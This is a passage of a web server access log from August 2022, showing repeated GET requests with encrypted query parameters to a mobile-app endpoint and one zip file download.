QWHEUcyygsVK1dai15F/kubKnDxdJvXV+fEfg5NMsUBYm6URpY6opegWIx84O8eGnb6hRCeCYsP1YaGmhkmFLz6yZBkHct5N+vXi02cKKgIb4TXTVR3tM/R5bRlNqQWiFfOJYpHd+HY93hgPpoA7BN6auqKV4R+mB29A9I3c80aKStYeNjfCgyTv9AAD4NRtwPZ8dyOkuk5ldRGSS8bf3rHSVFbE42qo/bfBDkXoWVEem+jx4aKAM7hP+DT/YIWa7oo6SZkOVqiF3MILHH+JAnHSLZNLEm53HpNl7o0IiyvUOYz3Ws1igNZ7KNEzeEoso3Ic1Q==&u=U2FsdGVkX19wGa3rN3XVmWQwTNQLbAEQgryw58UoOuM=&y=U2FsdGVkX1//Q7/V/YVD9AV7XXSPhslB16nau4zV7cQ= HTTP/1.1" 200 25
186.102.1.12 - - [28/Aug/2022:14:13:04 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Ge7ZSyu5vSY/jNFzuAMC+80xWha45Ayh1QsRZ/EdbFBnq/8exFsL5PEqrY1TD3UzmdDE6BKvN6Wjk9E3sFX1MW2qVMa/BR5vDgXe/7xyjJ5HkRQIcy4bjqoFn9GLzhagsh3meZz0dp4A3Z0UjLD+R+/gw4mwIuUE=&u=U2FsdGVkX19wGa3rN3XVmWQwTNQLbAEQgryw58UoOuM=&y=U2FsdGVkX1//Q7/V/YVD9AV7XXSPhslB16nau4zV7cQ= HTTP/1.1" 200 25
186.102.1.12 - - [28/Aug/2022:14:13:04 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18tKwuDnLE4KHbbR4EGOydgG0I+ZC62xxlI76K1ypRyH/cpMsjVidCtcOJGJjrPTwwz4W1bN8cpquDjprLFLNMRouYLVsCD+9QHL5TOsEUOif4uz1YWA6PEezYTZ+6VglDjaThuZPZVfI5Wape5YoOnbYvdqVgGDpI=&u=U2FsdGVkX19wGa3rN3XVmWQwTNQLbAEQgryw58UoOuM=&y=U2FsdGVkX1//Q7/V/YVD9AV7XXSPhslB16nau4zV7cQ= HTTP/1.1" 200 25
186.102.1.12 - - [28/Aug/2022:14:13:04 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+417mJCYWtsrT8dUXQyrTL54OSDB37nYbST+rz5Dnhhk/Y+NC+je/QM3tTmtNQbtZnt1rUY4PNoWbUo1oSs0oAQKPLoj9AyMBk7xyjeLaG2y598Q8o7FEEhS9cQSZG1VTn8pDFAiyxjXusKBpLu6yQXIM1n+J+heU=&u=U2FsdGVkX19wGa3rN3XVmWQwTNQLbAEQgryw58UoOuM=&y=U2FsdGVkX1//Q7/V/YVD9AV7XXSPhslB16nau4zV7cQ= HTTP/1.1" 200 25
186.102.1.12 - - [28/Aug/2022:14:13:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19X0utxK/3fJ8bTSmcFcESitAlhDcCMk8Ejxn93zOhqtwIZ8xQ0tlcQ5pFv0pEinqaQsq1sm/HjNdr1ckIsxfNG4TnvzS5sDFr6n/4F7YnB/cASIZ7bRZ2BASAp9QeJXIvJ+Vdou0IlDOi2YyiS4O0qfrEfYy0eVTWGTA5KynwifGdguAongADj&u=U2FsdGVkX19wGa3rN3XVmWQwTNQLbAEQgryw58UoOuM=&y=U2FsdGVkX1//Q7/V/YVD9AV7XXSPhslB16nau4zV7cQ= HTTP/1.1" 200 25
191.95.60.62 - - [28/Aug/2022:14:13:00 -0500] "GET /Publicaciones/SSFFS-05805.zip HTTP/1.1" 200 480313
186.102.1.12 - - [28/Aug/2022:14:13:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/im/1b1sjRH5+DibQQTSd17vrhtHsRo5ptSG9tOJDK5WMkbKzOrsLy1TjBbXyh0k8WE9mGj2DVz0VZhxzqSqlGJmkAa5QZLm+gmNvwR1KgYisBFj+ogu5xQEAnZ6pJ+jKuf3gQss0cE4RgB9hj6LFxTe3UKKaeeliNY6XDAPTe2v92sbj25J8v73ov1cxq4QL0gcnpsqdF6yMrdTlsUKeG5NOtcx83FCHp9LbsprBPZdz0MjId0bdAQ1kFXfGxeDxvInh4SDHQQQStQrBgYZA0dVhuYs3v5ZO4nmhS5gEk9AYAytQWru+xxXryvKNgLUfuU8NP3ljzylxlQfvWFJcYwAeSES+9AyjunGmHbKMtkjcfcMWs5StEcQBKHD1lC9/HS/6POau9ivrWfT7Ta0CF2PstONNPUgSZtqI6fRy8rOdCZWkhoSV4&u=U2FsdGVkX19wGa3rN3XVmWQwTNQLbAEQgryw58UoOuM=&y=U2FsdGVkX1//Q7/V/YVD9AV7XXSPhslB16nau4zV7cQ= HTTP/1.1" 200 25
